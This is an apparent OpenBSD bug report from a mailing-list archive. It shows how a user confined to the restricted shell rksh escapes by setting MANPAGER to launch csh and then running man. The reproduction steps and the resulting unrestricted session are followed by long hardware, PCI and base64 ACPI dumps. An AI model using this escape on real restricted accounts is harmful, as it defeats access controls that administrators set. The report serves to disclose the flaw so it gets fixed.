(no subject)

classic Classic list List threaded Threaded
3 messages Options
Reply | Threaded
Open this post in threaded view
|

(no subject)

martin i
>Synopsis: escape rksh when user has access to man(1)
>Category: system
>Environment:
        System      : OpenBSD 5.8
        Details     : OpenBSD 5.8 (GENERIC) #1170: Sun Aug 16 02:26:00 MDT 2015
                         [hidden email]:/usr/src/sys/arch/amd64/compile/GENERIC

        Architecture: OpenBSD.amd64
        Machine     : amd64
>Description:
        user can escape rksh shell when he has access to man(1) using custom MANPAGER env variable
>How-To-Repeat:
        rksh user setup:

# grep whoo /etc/passwd
whoo:*:1001:1001:test user:/home/whoo:/bin/rksh
# grep rksh /etc/shells
/bin/rksh
#

# cd /home/whoo
# ls -lad . .profile
drwxr-xr-x  4 whoo  whoo   512 Feb  5 00:06 .
-rw-r--r--  1 root  wheel  136 Feb  5 09:57 .profile
#

# grep -vE '^$|^#' .profile
PATH="/home/whoo/bin"
export PATH HOME TERM
#

# ll /home/whoo/bin/
total 872
drwxr-xr-x  2 root  whoo     512 Feb  5 10:10 .
drwxr-xr-x  4 whoo  whoo     512 Feb  5 00:06 ..
-r-xr-xr-x  1 root  bin   422520 Aug 16 10:19 man
#

man copied from /usr/bin/

When logged as user whoo:

$ cd /
rksh: cd: restricted shell - can't cd
$ cd ..
rksh: cd: restricted shell - can't cd
$ unset PATH
rksh: unset: PATH is read only
$
$ export MANPAGER="/bin/csh -c /bin/csh"
$
$ man man
openbsd:man {1} setenv PATH "/bin:/usr/bin:/sbin:/usr/sbin"
openbsd:man {2} cd /
openbsd: {3} ls -la
total 34724
drwxr-xr-x  13 root  wheel      512 Dec  9 13:53 .
drwxr-xr-x  13 root  wheel      512 Dec  9 13:53 ..
drwxr-xr-x   2 root  wheel      512 Aug 16 10:18 altroot
drwxr-xr-x   2 root  wheel     1024 Aug 16 10:19 bin
-rw-r--r--   1 root  wheel    69780 Dec  9 12:45 boot

openbsd: {4} id
uid=1001(whoo) gid=1001(whoo) groups=1001(whoo)
openbsd: {5}
openbsd: {5} cd /usr/src
openbsd:src {6} pwd
/usr/src
openbsd:src {7}

>Fix:


dmesg:
OpenBSD 5.8 (GENERIC) #1170: Sun Aug 16 02:26:00 MDT 2015
    [hidden email]:/usr/src/sys/arch/amd64/compile/GENERIC
real mem = 520028160 (495MB)
avail mem = 500477952 (477MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.5 @ 0xe1000 (10 entries)
bios0: vendor innotek GmbH version "VirtualBox" date 12/01/2006
bios0: innotek GmbH VirtualBox
acpi0 at bios0: rev 2
acpi0: sleep states S0 S5
acpi0: tables DSDT FACP APIC SSDT
acpi0: wakeup devices
acpitimer0 at acpi0: 3579545 Hz, 32 bits
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Xeon(R) CPU E3-1240 V2 @ 3.40GHz, 3392.96 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,MWAIT,SSSE3,NXE,LONG,LAHF,PERF
cpu0: 256KB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: CPU supports MTRRs but not enabled by BIOS
cpu0: apic clock running at 1000MHz
cpu0: mwait min=64, max=64
ioapic0 at mainbus0: apid 1 pa 0xfec00000, version 11, 24 pins
acpiprt0 at acpi0: bus 0 (PCI0)
acpicpu0 at acpi0: C1(@1 halt!)
acpibat0 at acpi0: BAT0 not present
acpiac0 at acpi0: AC unit online
acpivideo0 at acpi0: GFX0
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel 82441FX" rev 0x02
pcib0 at pci0 dev 1 function 0 "Intel 82371SB ISA" rev 0x00
pciide0 at pci0 dev 1 function 1 "Intel 82371AB IDE" rev 0x01: DMA, channel 0 configured to compatibility, channel 1 configured to compatibility
atapiscsi0 at pciide0 channel 0 drive 0
scsibus1 at atapiscsi0: 2 targets
cd0 at scsibus1 targ 0 lun 0: <VBOX, CD-ROM, 1.0> ATAPI 5/cdrom removable
cd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
pciide0: channel 1 disabled (no drives)
vga1 at pci0 dev 2 function 0 "InnoTek VirtualBox Graphics Adapter" rev 0x00
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
em0 at pci0 dev 3 function 0 "Intel 82540EM" rev 0x02: apic 1 int 19, address 08:00:27:4a:36:ae
"InnoTek VirtualBox Guest Service" rev 0x00 at pci0 dev 4 function 0 not configured
piixpm0 at pci0 dev 7 function 0 "Intel 82371AB Power" rev 0x08: SMBus disabled
em1 at pci0 dev 8 function 0 "Intel 82540EM" rev 0x02: apic 1 int 16, address 08:00:27:bd:8d:cd
ahci0 at pci0 dev 13 function 0 "Intel 82801HBM AHCI" rev 0x02: apic 1 int 21, AHCI 1.1
ahci0: device on port 0 didn't come ready, TFD: 0x171<ERR>
ahci0: port 0: 3.0Gb/s
scsibus2 at ahci0: 32 targets
sd0 at scsibus2 targ 0 lun 0: <ATA, VBOX HARDDISK, 1.0> SCSI3 0/direct fixed t10.ATA_VBOX_HARDDISK_VB6c7e77f0-608bff3e_
sd0: 20480MB, 512 bytes/sector, 41943040 sectors
isa0 at pcib0
isadma0 at isa0
com0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
com0: console
pckbc0 at isa0 port 0x60/5 irq 1 irq 12
pckbd0 at pckbc0 (kbd slot)
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
wsmouse0 at pms0 mux 0
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
vscsi0 at root
scsibus3 at vscsi0: 256 targets
softraid0 at root
scsibus4 at softraid0: 256 targets
root on sd0a (ac508e847be44516.a) swap on sd0b dump on sd0b

usbdevs:
usbdevs: no USB controllers found

pcidump:
Domain /dev/pci0:
 0:0:0: Intel 82441FX
        0x0000: Vendor ID: 8086 Product ID: 1237
        0x0004: Command: 0000 Status: 0000
        0x0008: Class: 06 Subclass: 00 Interface: 00 Revision: 02
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR empty (00000000)
        0x0014: BAR empty (00000000)
        0x0018: BAR empty (00000000)
        0x001c: BAR empty (00000000)
        0x0020: BAR empty (00000000)
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 0000 Product ID: 0000
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 00 Line: 00 Min Gnt: 00 Max Lat: 00
        0x0000: 12378086 00000000 06000002 00000000
        0x0010: 00000000 00000000 00000000 00000000
        0x0020: 00000000 00000000 00000000 00000000
        0x0030: 00000000 00000000 00000000 00000000
        0x0040: 00000000 00000000 00000000 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 00000000 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000000 00000000 00000000 00000000
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 00000000
        0x00e0: 00000000 00000000 00000000 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:1:0: Intel 82371SB ISA
        0x0000: Vendor ID: 8086 Product ID: 7000
        0x0004: Command: 0007 Status: 0200
        0x0008: Class: 06 Subclass: 01 Interface: 00 Revision: 00
        0x000c: BIST: 00 Header Type: 80 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR empty (00000000)
        0x0014: BAR empty (00000000)
        0x0018: BAR empty (00000000)
        0x001c: BAR empty (00000000)
        0x0020: BAR empty (00000000)
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 0000 Product ID: 0000
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 00 Line: 00 Min Gnt: 00 Max Lat: 00
        0x0000: 70008086 02000007 06010000 00800000
        0x0010: 00000000 00000000 00000000 00000000
        0x0020: 00000000 00000000 00000000 00000000
        0x0030: 00000000 00000000 00000000 00000000
        0x0040: 00000000 00000000 00000000 0003004d
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 090a0b0b 00000000 00000200 00000000
        0x0070: 00000080 0c0c0000 00000002 00000000
        0x0080: 00020000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000008 00000000 0000000f 0000ef00
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 00be0000
        0x00e0: 00000000 00000000 00000000 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:1:1: Intel 82371AB IDE
        0x0000: Vendor ID: 8086 Product ID: 7111
        0x0004: Command: 0007 Status: 0000
        0x0008: Class: 01 Subclass: 01 Interface: 8a Revision: 01
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR empty (00000000)
        0x0014: BAR empty (00000000)
        0x0018: BAR empty (00000000)
        0x001c: BAR empty (00000000)
        0x0020: BAR io addr: 0x0000d000/0x0010
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 0000 Product ID: 0000
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 00 Line: 00 Min Gnt: 00 Max Lat: 00
        0x0000: 71118086 00000007 01018a01 00000000
        0x0010: 00000000 00000000 00000000 00000000
        0x0020: 0000d001 00000000 00000000 00000000
        0x0030: 00000000 00000000 00000000 00000000
        0x0040: 0000a307 00000000 00020001 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 00000000 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000000 00000000 00000000 00000000
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 00000000
        0x00e0: 00000000 00000000 00000000 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:2:0: InnoTek VirtualBox Graphics Adapter
        0x0000: Vendor ID: 80ee Product ID: beef
        0x0004: Command: 0007 Status: 0000
        0x0008: Class: 03 Subclass: 00 Interface: 00 Revision: 00
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR mem prefetchable 32bit addr: 0xe0000000/0x00800000
        0x0014: BAR empty (00000000)
        0x0018: BAR empty (00000000)
        0x001c: BAR empty (00000000)
        0x0020: BAR empty (00000000)
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 0000 Product ID: 0000
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 01 Line: 0b Min Gnt: 00 Max Lat: 00
        0x0000: beef80ee 00000007 03000000 00000000
        0x0010: e0000008 00000000 00000000 00000000
        0x0020: 00000000 00000000 00000000 00000000
        0x0030: 00000000 00000000 00000000 0000010b
        0x0040: 00000000 00000000 00000000 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 00000000 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000000 00000000 00000000 00000000
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 00000000
        0x00e0: 00000000 00000000 00000000 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:3:0: Intel 82540EM
        0x0000: Vendor ID: 8086 Product ID: 100e
        0x0004: Command: 0007 Status: 0230
        0x0008: Class: 02 Subclass: 00 Interface: 00 Revision: 02
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR mem 32bit addr: 0xf0000000/0x00020000
        0x0014: BAR empty (00000000)
        0x0018: BAR io addr: 0x0000d010/0x0008
        0x001c: BAR empty (00000000)
        0x0020: BAR empty (00000000)
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 8086 Product ID: 001e
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 01 Line: 0a Min Gnt: ff Max Lat: 00
        0x00dc: Capability 0x01: Power Management
        0x00e4: Capability 0x07: PCI-X
        0x0000: 100e8086 02300007 02000002 00000000
        0x0010: f0000000 00000000 0000d011 00000000
        0x0020: 00000000 00000000 00000000 001e8086
        0x0030: 00000000 000000dc 00000000 00ff010a
        0x0040: 00000000 00000000 00000000 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 00000000 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000000 00000000 00000000 00000000
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 0022e401
        0x00e0: 00000000 00020007 0040fff8 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:4:0: InnoTek VirtualBox Guest Service
        0x0000: Vendor ID: 80ee Product ID: cafe
        0x0004: Command: 0007 Status: 0000
        0x0008: Class: 08 Subclass: 80 Interface: 00 Revision: 00
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR io addr: 0x0000d020/0x0020
        0x0014: BAR mem 32bit addr: 0xf0400000/0x00400000
        0x0018: BAR mem prefetchable 32bit addr: 0xf0800000/0x00004000
        0x001c: BAR empty (00000000)
        0x0020: BAR empty (00000000)
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 0000 Product ID: 0000
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 01 Line: 09 Min Gnt: 00 Max Lat: 00
        0x0000: cafe80ee 00000007 08800000 00000000
        0x0010: 0000d021 f0400000 f0800008 00000000
        0x0020: 00000000 00000000 00000000 00000000
        0x0030: 00000000 00000000 00000000 00000109
        0x0040: 00000000 00000000 00000000 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 00000000 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000000 00000000 00000000 00000000
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 00000000
        0x00e0: 00000000 00000000 00000000 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:7:0: Intel 82371AB Power
        0x0000: Vendor ID: 8086 Product ID: 7113
        0x0004: Command: 0007 Status: 0280
        0x0008: Class: 06 Subclass: 80 Interface: 00 Revision: 08
        0x000c: BIST: 00 Header Type: 80 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR empty (00000000)
        0x0014: BAR empty (00000000)
        0x0018: BAR empty (00000000)
        0x001c: BAR empty (00000000)
        0x0020: BAR empty (00000000)
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 0000 Product ID: 0000
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 01 Line: 09 Min Gnt: 00 Max Lat: 00
        0x0000: 71138086 02800007 06800008 00800000
        0x0010: 00000000 00000000 00000000 00000000
        0x0020: 00000000 00000000 00000000 00000000
        0x0030: 00000000 00000000 00000000 00000109
        0x0040: 00000001 00000000 00000000 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 00000000 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000000 00000000 00000000 00000000
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 00000000
        0x00e0: 00000000 00000000 00000000 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:8:0: Intel 82540EM
        0x0000: Vendor ID: 8086 Product ID: 100e
        0x0004: Command: 0007 Status: 0230
        0x0008: Class: 02 Subclass: 00 Interface: 00 Revision: 02
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR mem 32bit addr: 0xf0820000/0x00020000
        0x0014: BAR empty (00000000)
        0x0018: BAR io addr: 0x0000d040/0x0008
        0x001c: BAR empty (00000000)
        0x0020: BAR empty (00000000)
        0x0024: BAR empty (00000000)
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 8086 Product ID: 001e
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 01 Line: 09 Min Gnt: ff Max Lat: 00
        0x00dc: Capability 0x01: Power Management
        0x00e4: Capability 0x07: PCI-X
        0x0000: 100e8086 02300007 02000002 00000000
        0x0010: f0820000 00000000 0000d041 00000000
        0x0020: 00000000 00000000 00000000 001e8086
        0x0030: 00000000 000000dc 00000000 00ff0109
        0x0040: 00000000 00000000 00000000 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 00000000 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 00000000 00000000 00000000 00000000
        0x00a0: 00000000 00000000 00000000 00000000
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 0022e401
        0x00e0: 00000000 00020007 0040fff8 00000000
        0x00f0: 00000000 00000000 00000000 00000000
 0:13:0: Intel 82801HBM AHCI
        0x0000: Vendor ID: 8086 Product ID: 2829
        0x0004: Command: 0007 Status: 0010
        0x0008: Class: 01 Subclass: 06 Interface: 01 Revision: 02
        0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 00
        0x0010: BAR io addr: 0x0000d048/0x0008
        0x0014: BAR io addr: 0x0000d050/0x0002
        0x0018: BAR io addr: 0x0000d058/0x0008
        0x001c: BAR io addr: 0x0000d060/0x0002
        0x0020: BAR io addr: 0x0000d070/0x0010
        0x0024: BAR mem 32bit addr: 0xf0840000/0x00002000
        0x0028: Cardbus CIS: 00000000
        0x002c: Subsystem Vendor ID: 0000 Product ID: 0000
        0x0030: Expansion ROM Base Address: 00000000
        0x0038: 00000000
        0x003c: Interrupt Pin: 01 Line: 0b Min Gnt: 00 Max Lat: 00
        0x0070: Capability 0x01: Power Management
        0x00a8: Capability 0x12: SATA
        0x0000: 28298086 00100007 01060102 00000000
        0x0010: 0000d049 0000d051 0000d059 0000d061
        0x0020: 0000d071 f0840000 00000000 00000000
        0x0030: 00000000 00000070 00000000 0000010b
        0x0040: 00000000 00000000 00000000 00000000
        0x0050: 00000000 00000000 00000000 00000000
        0x0060: 00000000 00000000 00000000 00000000
        0x0070: 0003a801 00000000 00000000 00000000
        0x0080: 00000000 00000000 00000000 00000000
        0x0090: 013f0040 78000180 00000000 00000000
        0x00a0: 00000000 00000000 00100012 00000028
        0x00b0: 00000000 00000000 00000000 00000000
        0x00c0: 00000000 00000000 00000000 00000000
        0x00d0: 00000000 00000000 00000000 00000000
        0x00e0: 00000000 00000000 00000000 00000000
        0x00f0: 00000000 00000000 00000000 00000000

acpidump:
begin-base64 644 openbsd.APIC.3
QVBJQ1QAAAACY1ZCT1ggIFZCT1hBUElDAQAAAEFTTCBhAAAAAADg/gEAAAACCgAAAgAAAAAAAgoA
CQkAAAANAAAIAAABAAAAAQwBAAAAwP4AAAAA
====
begin-base64 644 openbsd.DSDT.2
RFNEVPEbAAABhlZCT1ggIFZCT1hCSU9TAgAAAElOVEwVBRUgW4BEQkcwAQsAMAoEW4ELREJHMAFE
SEUxCFuBC0RCRzACREhFMhBbgQtEQkcwA0RIRTQgW4ENREJHMAEACERDSFIIFAxIRVhfAXBoREhF
MRQMSEVYMgFwaERIRTIUDEhFWDQBcGhESEU0FAxTTEVOAXBoYKSHYBQkUzJCRgFwaGByU0xFTmAB
YAhCVUZGEQJgcGhCVUZGpEJVRkYUKkRCR18BcGhgcFMyQkZgYXCHYWB2YHAAYqIQYHZgcIOIYWIA
RENIUnViCFBJQ00AFCFfUElDAURCR18NUGljIG1vZGU6IABIRVg0aHBoUElDTVuAU1lTSQELSEAK
CFuBEFNZU0kDSURYMCBEQVQwIFuGTQlJRFgwREFUMANNRU1MIFVJT0EgVUhQVCBVU01DIFVGREMg
VUNQMCBVQ1AxIFVDUDIgVUNQMyBNRU1IIFVSVEMgQ1BVTCBDUFVDIENQRVQgQ1BFViBOSUNBIEhE
QUEgUFdSUyBJT0NBIEhCQ0EgUENJQiBQQ0lMIFNMMEIgU0wwSSBTTDFCIFNMMUkgAEAMSU5JTiAA
QL5WQUlOIBCDYQFfU0JfFEkIX0lOSQBwDN7ArQtWQUlOREJHXw1NRU1MOiAASEVYNE1FTUxEQkdf
DVVJT0E6IABIRVg0VUlPQURCR18NVUhQVDogAEhFWDRVSFBUREJHXw1VU01DOiAASEVYNFVTTUNE
QkdfDVVGREM6IABIRVg0VUZEQ0RCR18NTUVNSDogAEhFWDRNRU1ICFBSMDAST2x4Eg0EDP//AgAA
TE5LQgASDQQM//8CAAFMTktDABIOBAz//wIACgJMTktEABIOBAz//wIACgNMTktBABINBAz//wMA
AExOS0MAEg0EDP//AwABTE5LRAASDgQM//8DAAoCTE5LQQASDgQM//8DAAoDTE5LQgASDQQM//8E
AABMTktEABINBAz//wQAAUxOS0EAEg4EDP//BAAKAkxOS0IAEg4EDP//BAAKA0xOS0MAEg0EDP//
BQAATE5LQQASDQQM//8FAAFMTktCABIOBAz//wUACgJMTktDABIOBAz//wUACgNMTktEABINBAz/
/wYAAExOS0IAEg0EDP//BgABTE5LQwASDgQM//8GAAoCTE5LRAASDgQM//8GAAoDTE5LQQASDQQM
//8HAABMTktDABINBAz//wcAAUxOS0QAEg4EDP//BwAKAkxOS0EAEg4EDP//BwAKA0xOS0IAEg0E
DP//CAAATE5LRAASDQQM//8IAAFMTktBABIOBAz//wgACgJMTktCABIOBAz//wgACgNMTktDABIN
BAz//wkAAExOS0EAEg0EDP//CQABTE5LQgASDgQM//8JAAoCTE5LQwASDgQM//8JAAoDTE5LRAAS
DQQM//8KAABMTktCABINBAz//woAAUxOS0MAEg4EDP//CgAKAkxOS0QAEg4EDP//CgAKA0xOS0EA
Eg0EDP//CwAATE5LQwASDQQM//8LAAFMTktEABIOBAz//wsACgJMTktBABIOBAz//wsACgNMTktC
ABINBAz//wwAAExOS0QAEg0EDP//DAABTE5LQQASDgQM//8MAAoCTE5LQgASDgQM//8MAAoDTE5L
QwASDQQM//8NAABMTktBABINBAz//w0AAUxOS0IAEg4EDP//DQAKAkxOS0MAEg4EDP//DQAKA0xO
S0QAEg0EDP//DgAATE5LQgASDQQM//8OAAFMTktDABIOBAz//w4ACgJMTktEABIOBAz//w4ACgNM
TktBABINBAz//w8AAExOS0MAEg0EDP//DwABTE5LRAASDgQM//8PAAoCTE5LQQASDgQM//8PAAoD
TE5LQgASDQQM//8QAABMTktEABINBAz//xAAAUxOS0EAEg4EDP//EAAKAkxOS0IAEg4EDP//EAAK
A0xOS0MAEg0EDP//EQAATE5LQQASDQQM//8RAAFMTktCABIOBAz//xEACgJMTktDABIOBAz//xEA
CgNMTktEABINBAz//xIAAExOS0IAEg0EDP//EgABTE5LQwASDgQM//8SAAoCTE5LRAASDgQM//8S
AAoDTE5LQQASDQQM//8TAABMTktDABINBAz//xMAAUxOS0QAEg4EDP//EwAKAkxOS0EAEg4EDP//
EwAKA0xOS0IAEg0EDP//FAAATE5LRAASDQQM//8UAAFMTktBABIOBAz//xQACgJMTktCABIOBAz/
/xQACgNMTktDABINBAz//xUAAExOS0EAEg0EDP//FQABTE5LQgASDgQM//8VAAoCTE5LQwASDgQM
//8VAAoDTE5LRAASDQQM//8WAABMTktCABINBAz//xYAAUxOS0MAEg4EDP//FgAKAkxOS0QAEg4E
DP//FgAKA0xOS0EAEg0EDP//FwAATE5LQwASDQQM//8XAAFMTktEABIOBAz//xcACgJMTktBABIO
BAz//xcACgNMTktCABINBAz//xgAAExOS0QAEg0EDP//GAABTE5LQQASDgQM//8YAAoCTE5LQgAS
DgQM//8YAAoDTE5LQwASDQQM//8ZAABMTktBABINBAz//xkAAUxOS0IAEg4EDP//GQAKAkxOS0MA
Eg4EDP//GQAKA0xOS0QAEg0EDP//GgAATE5LQgASDQQM//8aAAFMTktDABIOBAz//xoACgJMTktE
ABIOBAz//xoACgNMTktBABINBAz//xsAAExOS0MAEg0EDP//GwABTE5LRAASDgQM//8bAAoCTE5L
QQASDgQM//8bAAoDTE5LQgASDQQM//8cAABMTktEABINBAz//xwAAUxOS0EAEg4EDP//HAAKAkxO
S0IAEg4EDP//HAAKA0xOS0MAEg0EDP//HQAATE5LQQASDQQM//8dAAFMTktCABIOBAz//x0ACgJM
TktDABIOBAz//x0ACgNMTktEABINBAz//x4AAExOS0IAEg0EDP//HgABTE5LQwASDgQM//8eAAoC
TE5LRAASDgQM//8eAAoDTE5LQQASDQQM//8fAABMTktDABINBAz//x8AAUxOS0QAEg4EDP//HwAK
AkxOS0EAEg4EDP//HwAKA0xOS0IACFBSMDEST114EgsEDP//AgAAAAoSEgsEDP//AgABAAoTEgwE
DP//AgAKAgAKFBIMBAz//wIACgMAChUSCwQM//8DAAAAChMSCwQM//8DAAEAChQSDAQM//8DAAoC
AAoVEgwEDP//AwAKAwAKFhILBAz//wQAAAAKFBILBAz//wQAAQAKFRIMBAz//wQACgIAChYSDAQM
//8EAAoDAAoXEgsEDP//BQAAAAoVEgsEDP//BQABAAoWEgwEDP//BQAKAgAKFxIMBAz//wUACgMA
ChASCwQM//8GAAAAChYSCwQM//8GAAEAChcSDAQM//8GAAoCAAoQEgwEDP//BgAKAwAKERILBAz/
/wcAAAAKFxILBAz//wcAAQAKEBIMBAz//wcACgIAChESDAQM//8HAAoDAAoSEgsEDP//CAAAAAoQ
EgsEDP//CAABAAoREgwEDP//CAAKAgAKEhIMBAz//wgACgMAChMSCwQM//8JAAAAChESCwQM//8J
AAEAChISDAQM//8JAAoCAAoTEgwEDP//CQAKAwAKFBILBAz//woAAAAKEhILBAz//woAAQAKExIM
BAz//woACgIAChQSDAQM//8KAAoDAAoVEgsEDP//CwAAAAoTEgsEDP//CwABAAoUEgwEDP//CwAK
AgAKFRIMBAz//wsACgMAChYSCwQM//8MAAAAChQSCwQM//8MAAEAChUSDAQM//8MAAoCAAoWEgwE
DP//DAAKAwAKFxILBAz//w0AAAAKFRILBAz//w0AAQAKFhIMBAz//w0ACgIAChcSDAQM//8NAAoD
AAoQEgsEDP//DgAAAAoWEgsEDP//DgABAAoXEgwEDP//DgAKAgAKEBIMBAz//w4ACgMAChESCwQM
//8PAAAAChcSCwQM//8PAAEAChASDAQM//8PAAoCAAoREgwEDP//DwAKAwAKEhILBAz//xAAAAAK
EBILBAz//xAAAQAKERIMBAz//xAACgIAChISDAQM//8QAAoDAAoTEgsEDP//EQAAAAoREgsEDP//
EQABAAoSEgwEDP//EQAKAgAKExIMBAz//xEACgMAChQSCwQM//8SAAAAChISCwQM//8SAAEAChMS
DAQM//8SAAoCAAoUEgwEDP//EgAKAwAKFRILBAz//xMAAAAKExILBAz//xMAAQAKFBIMBAz//xMA
CgIAChUSDAQM//8TAAoDAAoWEgsEDP//FAAAAAoUEgsEDP//FAABAAoVEgwEDP//FAAKAgAKFhIM
BAz//xQACgMAChcSCwQM//8VAAAAChUSCwQM//8VAAEAChYSDAQM//8VAAoCAAoXEgwEDP//FQAK
AwAKEBILBAz//xYAAAAKFhILBAz//xYAAQAKFxIMBAz//xYACgIAChASDAQM//8WAAoDAAoREgsE
DP//FwAAAAoXEgsEDP//FwABAAoQEgwEDP//FwAKAgAKERIMBAz//xcACgMAChISCwQM//8YAAAA
ChASCwQM//8YAAEAChESDAQM//8YAAoCAAoSEgwEDP//GAAKAwAKExILBAz//xkAAAAKERILBAz/
/xkAAQAKEhIMBAz//xkACgIAChMSDAQM//8ZAAoDAAoUEgsEDP//GgAAAAoSEgsEDP//GgABAAoT
EgwEDP//GgAKAgAKFBIMBAz//xoACgMAChUSCwQM//8bAAAAChMSCwQM//8bAAEAChQSDAQM//8b
AAoCAAoVEgwEDP//GwAKAwAKFhILBAz//xwAAAAKFBILBAz//xwAAQAKFRIMBAz//xwACgIAChYS
DAQM//8cAAoDAAoXEgsEDP//HQAAAAoVEgsEDP//HQABAAoWEgwEDP//HQAKAgAKFxIMBAz//x0A
CgMAChASCwQM//8eAAAAChYSCwQM//8eAAEAChcSDAQM//8eAAoCAAoQEgwEDP//HgAKAwAKERIL
BAz//x8AAAAKFxILBAz//x8AAQAKEBIMBAz//x8ACgIAChESDAQM//8fAAoDAAoSCFBSU0ERCQoG
